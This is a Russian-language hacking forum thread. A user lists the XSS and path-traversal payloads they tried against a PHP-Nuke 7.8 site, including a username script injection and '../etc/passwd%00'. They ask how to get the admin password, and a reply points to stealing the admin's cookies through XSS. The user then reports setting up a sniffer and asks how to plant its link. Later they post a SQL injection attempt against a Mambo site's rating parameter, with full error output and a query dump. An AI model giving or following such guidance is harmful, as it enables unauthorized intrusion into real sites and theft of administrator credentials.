Вобшем просмотрея я видео по влому нюки 7.8 попробывал некоторое из того что описано там Пассивные XSS: 1)(параметр username) http://ya.ru/nuke/modules.php?name=Your_Account&code=ggg&op=mailpasswd&username=<h1>[XSS] -ответ:Регистрационный код для [XSS] отправлен. 2)(дырявый поиск) search"style="background:url(javascript:alert()) - выдал ошибку в пустом окошке. 3)http://[target]/[nuke_dir]/modules.php?name=Search &file=../../../../../../ ../../../etc/passwd%00 -пишет You are so cool... 4)http://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS]&query=[our query] -ответ: Результат поиска Ничего не найдено по вашему запросу 999999999 Предыдущие 5)http://[target]/nuke75/index.php?inside_mod=1 - ответ:The html tags you attempted to use are not allowed [ Go Back ] Вот вроде и всё подскажите плиз как мона с помощью этого узнать пас админа логин я знаю. если можна опишите подробнее... P.S. Извиняйте за корявое обьяснение.Заране благодарен за помощь
мда... Это и есть JavaScript! Короче тут XSS уязвимость.... Тут стоит фильтрация... Тут тоже... Короче юзай инфу по XSS и пойймешь, как спомощью этого украсть куки админа...
Вобшем почитал я статейки по хсс не всё конечна понял но смог снифер поставить единственая проблема как теперь сылку на него в сайт впихнуть . Да кстати тута ещё один вопрос по мамбе назрел есть сайтик стоит мамба я вписал: http://сайт.ru/index.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=[sql]/* в ответ : Notice: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = '85.140.29.41' WHERE content_id = 1' at lin in /home/c/cайт.h16.ru/WWW/includes/database.php on line 184 UPDATE mos_content_rating SET rating_count = rating_count + 1, rating_sum = rating_sum + 1,rating_count=[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1 /home/c/сайт.ru/WWW/components/com_content/content.php:1426 /home/c/сайт.h16.ru/WWW/components/com_content/content.php:96 /home/c/сайт.h16.ru/WWW/index.php:180DB function failed with error number 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1' at lin SQL=UPDATE mos_content_rating SET rating_count = rating_count + 1, rating_sum = rating_sum + 1,rating_count=[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1 _____помоему это дырка??? Да кстати у них на главной странице вот такая фигня внизу вылезает: 37 queries executed 1 SELECT template FROM mos_templates_menu WHERE client_id='0' AND menuid='0'--------------------------------------------------------------------------------2 DELETE FROM mos_session WHERE (time < 1164353432)--------------------------------------------------------------------------------3 SELECT * FROM mos_session WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------4 UPDATE mos_session SET `time`='1164354332',`userid`='0',`usertype`='',`username`='',`gid`='0',`guest`='1' WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------5 SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup FROM mos_mambots WHERE published >= 1 AND access <= 0 AND folder='editors' ORDER BY ordering--------------------------------------------------------------------------------6 SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup FROM mos_mambots WHERE published >= 1 AND access <= 0 AND folder='editors-xtd' ORDER BY ordering--------------------------------------------------------------------------------7 SELECT access FROM mos_menu WHERE link like 'index.php?option=com_poll&task=results%'--------------------------------------------------------------------------------8 SELECT * FROM mos_polls WHERE id='14'--------------------------------------------------------------------------------9 SELECT MIN(date) AS mindate, MAX(date) AS maxdate FROM mos_poll_date WHERE poll_id='14'--------------------------------------------------------------------------------10 SELECT a.text, count( DISTINCT b.id ) AS hits, count( DISTINCT b.id )/COUNT( DISTINCT c.id )*100.0 AS percent FROM mos_poll_data AS a LEFT JOIN mos_poll_date AS b ON b.vote_id = a.id LEFT JOIN mos_poll_date AS c ON c.poll_id = a.pollid WHERE a.pollid='14' AND a.text <> '' GROUP BY a.id ORDER BY a.id--------------------------------------------------------------------------------11 SELECT id, title FROM mos_polls WHERE published=1 ORDER BY id--------------------------------------------------------------------------------12 SELECT * FROM mos_menu WHERE id='0'--------------------------------------------------------------------------------13 SELECT id, title, module, position, content, showtitle, params FROM mos_modules AS m, mos_modules_menu AS mm WHERE m.published='1' AND m.access <= '0' AND m.client_id='0' AND mm.moduleid=m.id AND (mm.menuid = '0' OR mm.menuid = '0') ORDER BY ordering--------------------------------------------------------------------------------14 SELECT id, link FROM mos_menu WHERE menutype='mainmenu' AND published='1' ORDER BY parent, ordering LIMIT 1--------------------------------------------------------------------------------15 SELECT id, name, link, parent, type FROM mos_menu WHERE published='1' ORDER BY parent, ordering--------------------------------------------------------------------------------16 SELECT m.* FROM mos_menu AS m WHERE menutype='topmenu' AND published='1' AND access <= '0' AND parent='0' ORDER BY ordering--------------------------------------------------------------------------------17 SELECT m.* FROM mos_menu AS m WHERE menutype='mainmenu' AND published='1' AND access <= '0' ORDER BY parent,ordering--------------------------------------------------------------------------------18 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------19 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------20 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------21 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------22 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------23 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------24 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------25 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------26 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------27 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------28 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------29 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------30 SELECT m.* FROM mos_menu AS m WHERE menutype='othermenu' AND published='1' AND access <= '0' ORDER BY parent,ordering--------------------------------------------------------------------------------31 SELECT count(*) AS numrows FROM mos_banner WHERE showBanner=1--------------------------------------------------------------------------------32 SELECT * FROM mos_banner WHERE showBanner=1 LIMIT 0,1--------------------------------------------------------------------------------33 SELECT p.id, p.title FROM mos_poll_menu AS pm, mos_polls AS p WHERE (pm.menuid='0' OR pm.menuid='0') AND p.id=pm.pollid AND p.published=1--------------------------------------------------------------------------------34 SELECT id, text FROM mos_poll_data WHERE pollid='14' AND text <> '' ORDER BY id--------------------------------------------------------------------------------35 SELECT count(session_id) as guest_online FROM mos_session WHERE guest=1 AND (usertype is NULL OR usertype='')--------------------------------------------------------------------------------36 SELECT DISTINCT count(username) as user_online FROM mos_session WHERE guest=0 AND usertype <> 'administrator' AND usertype <> 'superadministrator'--------------------------------------------------------------------------------37 SELECT DISTINCT a.username FROM mos_session AS a WHERE (a.guest=0) Помоему это таже дырка хотя может и ошибаюсь
